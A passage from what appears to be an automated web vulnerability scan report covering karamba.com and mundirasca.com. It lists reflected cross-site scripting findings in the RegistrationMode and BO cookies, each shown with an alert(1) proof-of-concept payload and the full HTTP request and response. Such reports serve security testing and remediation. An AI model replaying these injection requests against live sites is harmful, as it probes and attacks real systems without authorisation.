<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMaa02b"-alert(1)-"205ddca80aa";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.288. http://www.karamba.com/click/Karamba.com/ENG/Home/ [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /click/Karamba.com/ENG/Home/

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27ef6"-alert(1)-"ef0a28ae39e was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /click/Karamba.com/ENG/Home/ HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM27ef6"-alert(1)-"ef0a28ae39e; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:39:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM27ef6"-alert(1)-"ef0a28ae39e; domain=karamba.com; expires=Fri, 16-May-2014 12:39:37 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:39:37 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:39:37 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:39:37 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:39:37 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44724


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM27ef6"-alert(1)-"ef0a28ae39e";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.289. http://www.mundirasca.com/ [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e90c5"-alert(1)-"70b87b2a49a was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FMe90c5"-alert(1)-"70b87b2a49a; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:42 GMT; path=/
Set-Cookie: BO=FMe90c5"-alert(1)-"70b87b2a49a; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:42 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:42 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:42 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:42 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37133


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMe90c5"-alert(1)-"70b87b2a49a";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.290. http://www.mundirasca.com/ [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34c2f"-alert(1)-"de8074ef0c8 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM34c2f"-alert(1)-"de8074ef0c8; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM34c2f"-alert(1)-"de8074ef0c8; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:31 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:31 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:31 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:31 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:31 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37133


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM34c2f"-alert(1)-"de8074ef0c8";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.291. http://www.mundirasca.com/AboutUs.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /AboutUs.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2eacb"-alert(1)-"393917c80e3 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM2eacb"-alert(1)-"393917c80e3; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:07 GMT; path=/
Set-Cookie: BO=FM2eacb"-alert(1)-"393917c80e3; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:07 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:07 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:07 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:07 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37898


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM2eacb"-alert(1)-"393917c80e3";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.292. http://www.mundirasca.com/AboutUs.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /AboutUs.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 680d9"-alert(1)-"970a3606485 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM680d9"-alert(1)-"970a3606485; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM680d9"-alert(1)-"970a3606485; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:34 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:34 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:34 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:34 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:34 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37898


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM680d9"-alert(1)-"970a3606485";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.293. http://www.mundirasca.com/ContactUsChat.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /ContactUsChat.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bca8"-alert(1)-"3ea28a61f0 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ContactUsChat.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM7bca8"-alert(1)-"3ea28a61f0; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:30 GMT; path=/
Set-Cookie: BO=FM7bca8"-alert(1)-"3ea28a61f0; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:30 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:30 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:30 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:30 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36436


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM7bca8"-alert(1)-"3ea28a61f0";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.294. http://www.mundirasca.com/ContactUsChat.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /ContactUsChat.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca168"-alert(1)-"45edf73b8a was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ContactUsChat.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PMca168"-alert(1)-"45edf73b8a; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMca168"-alert(1)-"45edf73b8a; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:18 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:18 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:18 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:18 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:18 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36436


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMca168"-alert(1)-"45edf73b8a";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.295. http://www.mundirasca.com/ContactUsFax.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /ContactUsFax.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2f13"-alert(1)-"1ee1ea8d4dd was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ContactUsFax.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FMc2f13"-alert(1)-"1ee1ea8d4dd; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:04 GMT; path=/
Set-Cookie: BO=FMc2f13"-alert(1)-"1ee1ea8d4dd; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:04 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:04 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:04 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:04 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36346


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMc2f13"-alert(1)-"1ee1ea8d4dd";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.296. http://www.mundirasca.com/ContactUsFax.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /ContactUsFax.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ba74"-alert(1)-"a6f69e5d088 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ContactUsFax.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM1ba74"-alert(1)-"a6f69e5d088; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM1ba74"-alert(1)-"a6f69e5d088; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:45 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:45 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:45 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:45 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:45 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36346


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM1ba74"-alert(1)-"a6f69e5d088";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.297. http://www.mundirasca.com/ContactUsMail.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /ContactUsMail.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ff03"-alert(1)-"7fbdf972a1f was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
